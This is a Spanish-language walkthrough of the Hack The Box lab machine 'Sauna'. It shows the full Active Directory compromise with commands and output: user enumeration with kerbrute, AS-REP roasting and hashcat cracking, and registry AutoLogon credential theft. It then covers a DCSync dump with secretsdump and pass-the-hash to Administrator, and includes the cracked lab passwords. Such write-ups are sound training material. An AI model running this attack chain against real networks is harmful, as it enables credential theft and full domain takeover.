Sauna
Publicado: 20 de Junio de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Easy OS: Windows
📝 Descripción
Sauna es una máquina Windows de dificultad fácil que simula un entorno de Active Directory corporativo. La máquina presenta un sitio web de un banco ficticio que revela información sobre empleados, lo que permite la enumeración de usuarios válidos del dominio. La explotación inicial se logra mediante AS-REP Roasting contra un usuario sin pre-autenticación Kerberos habilitada. La escalada de privilegios se realiza a través del descubrimiento de credenciales hardcodeadas en el registro de Windows y culmina con un ataque DCSync para obtener acceso administrativo completo.
🎯 Puntos Clave
Reconocimiento web: Extracción de nombres de empleados del sitio web corporativo
Generación de usernames: Uso de username-anarchy para crear listas de usuarios potenciales
Enumeración de usuarios: Kerbrute para validar usuarios en el dominio
AS-REP Roasting: Explotación de usuarios sin pre-autenticación Kerberos
Credenciales en registro: Descubrimiento de credenciales de AutoLogon
Análisis con BloodHound: Identificación de privilegios DCSync
DCSync Attack: Volcado completo de hashes del dominio
🔭 Reconocimiento
🏓 Ping para verificación en base a TTL
❯ ping -c2 10.10.10.175
PING 10.10.10.175 (10.10.10.175) 56(84) bytes of data.
64 bytes from 10.10.10.175: icmp_seq=1 ttl=127 time=46.6 ms
64 bytes from 10.10.10.175: icmp_seq=2 ttl=127 time=47.7 ms
--- 10.10.10.175 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 46.611/47.153/47.695/0.542 ms💡 Nota: El TTL cercano a 128 sugiere que probablemente sea una máquina Windows.
🚀 Escaneo de puertos
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.175 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)echo $ports
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49697🔍 Enumeración de servicios
nmap -sC -sV -p$ports 10.10.10.175 -oN services.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-20 18:22 CEST
Nmap scan report for 10.10.10.175
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-20 23:22:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-20T23:23:14
|_ start_date: N/A⚠️ Añadimos el siguiente vhost a nuestro fichero /etc/hosts:
echo "10.10.10.175 EGOTISTICAL-BANK.LOCAL" | sudo tee -a /etc/hosts📋 Análisis de Servicios Detectados
Puerto 53 (DNS): Servidor DNS del dominio
Puerto 80 (HTTP): Sitio web corporativo del banco
Puerto 88 (Kerberos): Servicio de autenticación del dominio
Puerto 389/636 (LDAP/LDAPS): Servicios de directorio
Puerto 445 (SMB): Compartición de archivos
Puerto 5985 (WinRM): Administración remota de Windows
Puertos RPC varios: Servicios de llamadas remotas
🌐 Enumeración de Servicios
🗂️ Puerto 445 - SMB
Dado que no tenemos credenciales, intentamos enumeración con sesión nula pero no obtenemos información útil:
smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableenum4linux 10.10.10.175
# No devuelve información útil debido a restricciones de accesonetexec ldap 10.10.10.175 -u '' -p '' --users
LDAP 10.10.10.175 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP 10.10.10.175 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
LDAP 10.10.10.175 389 SAUNA [*] Enumerated 0 domain users: EGOTISTICAL-BANK.LOCAL🌐 Puerto 80 - HTTP (Egotistical Bank)
Al acceder al sitio web encontramos una página corporativa del banco ficticio "Egotistical Bank":
🔍 Fuzzing de directorios
dirsearch -u http://10.10.10.175 -x 503,404,403
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://10.10.10.175/
[18:29:49] Scanning:
[18:29:55] 200 - 30KB - /about.html
[18:30:03] 200 - 15KB - /contact.html
[18:30:03] 301 - 147B - /css -> http://10.10.10.175/css/
[18:30:05] 301 - 149B - /fonts -> http://10.10.10.175/fonts/
[18:30:07] 301 - 150B - /images -> http://10.10.10.175/images/
[18:30:07] 200 - 32KB - /index.html👥 Extracción de nombres de empleados
En la página /about.html encontramos información valiosa sobre los empleados del banco:
Fergus Smith - Senior Manager
Shaun Coins - Marketing Manager
Sophie Driver - Account Manager
Bowie Taylor - HR Manager
Hugo Bear - CEO
Steven Kerb - Software Engineer
Creamos una lista con estos nombres para generar posibles usernames:
# users.txt
Fergus Smith
Shaun Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb🎯 Explotación Inicial
👤 Generación de Usernames
Utilizamos username-anarchy para generar diferentes combinaciones de nombres de usuario:
username-anarchy --input-file users.txt --select-format first,flast,first.last,firstl > unames.txtEsto genera combinaciones como:
fergus, fsmith, fergus.smith, ferguss
shaun, scoins, shaun.coins, shauns
sophie, sdriver, sophie.driver, sophied
etc.
🔐 Enumeración de usuarios con Kerbrute
Usamos la herramienta kerbrute para tratar de enumerar usuarios válidos en el dominio
kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 unames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/20/25 - Ronnie Flathers @ropnop
2025/06/20 18:47:09 > Using KDC(s):
2025/06/20 18:47:09 > 10.10.10.175:88
2025/06/20 18:47:09 > [+] VALID USERNAME: fsmith@egotistical-bank.local
2025/06/20 18:47:09 > Done! Tested 24 usernames (1 valid) in 0.149 seconds¡Excelente! Encontramos un usuario válido: fsmith (Fergus Smith)
🎫 AS-REP Roasting
Verificamos si el usuario fsmith tiene la pre-autenticación de Kerberos deshabilitada:
impacket-GetNPUsers egotistical-bank.local/fsmith -no-pass -dc-ip 10.10.10.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a324[...hash...]¡Perfecto! El usuario tiene AS-REP Roasting habilitado. Guardamos el hash para crackearlo.
🔨 Cracking del hash
hashcat -m 18200 -a 0 fsmith_hash /usr/share/wordlists/rockyou.txt
# Resultado: Thestrokes23
¡Credenciales obtenidas!
Usuario:
fsmithContraseña:
Thestrokes23
✅ Verificación de acceso
netexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Authenticathed!)🚪 Acceso Inicial
💻 Conexión vía WinRM
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith🏃♂️ Captura de User Flag
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/20/2025 4:19 PM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
[USER_FLAG_HERE]🔝 Escalada de Privilegios
🔍 Enumeración del sistema
🗝️ Descubrimiento de credenciales en el registro
Realizamos enumeración básica del sistema en busca de vectores de escalada y encontramos credenciales almacenadas en el registro de Windows:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
DefaultDomainName REG_SZ EGOTISTICALBANK¡Nueva credencial encontrada!
Usuario:
svc_loanmgr(svc_loanmanager)Contraseña:
Moneymakestheworldgoround!
🔄 Movimiento lateral
Verificamos si esta nueva cuenta tiene acceso WinRM:
netexec winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Authenticathed!)Nos conectamos con la nueva cuenta:
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr🩸 Análisis con BloodHound
Para analizar mejor los privilegios y relaciones en el dominio, utilizamos SharpHound:
# Subimos SharpHound
*Evil-WinRM* PS C:\Temp> upload SharpHound.exe
# Ejecutamos la recolección de datos
*Evil-WinRM* PS C:\Temp> .\SharpHound.exe -c All --zipfilename SAUNA
# Descargamos los resultados
*Evil-WinRM* PS C:\Temp> download 20250620170139_SAUNA.zip📊 Análisis de privilegios
Una vez cargamos los datos en BloodHound y marcamos svc_loanmgr como "Owned", descubrimos que este usuario tiene privilegios especiales:
GetChanges: Permite leer cambios en el directorio
GetChangesAll: Permite leer todos los cambios, incluyendo secretos
Estos privilegios nos permiten realizar un ataque DCSync para volcar todos los hashes del dominio.
💀 Ataque DCSync
impacket-secretsdump egotistical-bank.local/svc_loanmgr@10.10.10.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password: [Moneymakestheworldgoround!]
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Cleaning up...¡Hash del Administrador obtenido!
Hash NTLM:
<REDACTED>
👑 Acceso como Administrador
🔐 Pass The Hash
Utilizamos el hash NTLM del administrador para obtener acceso completo:
evil-winrm -i 10.10.10.175 -u Administrator -H <REDACTED>
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator🏁 Captura de Root Flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/20/2025 4:19 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[ROOT_FLAG_HERE]Last updated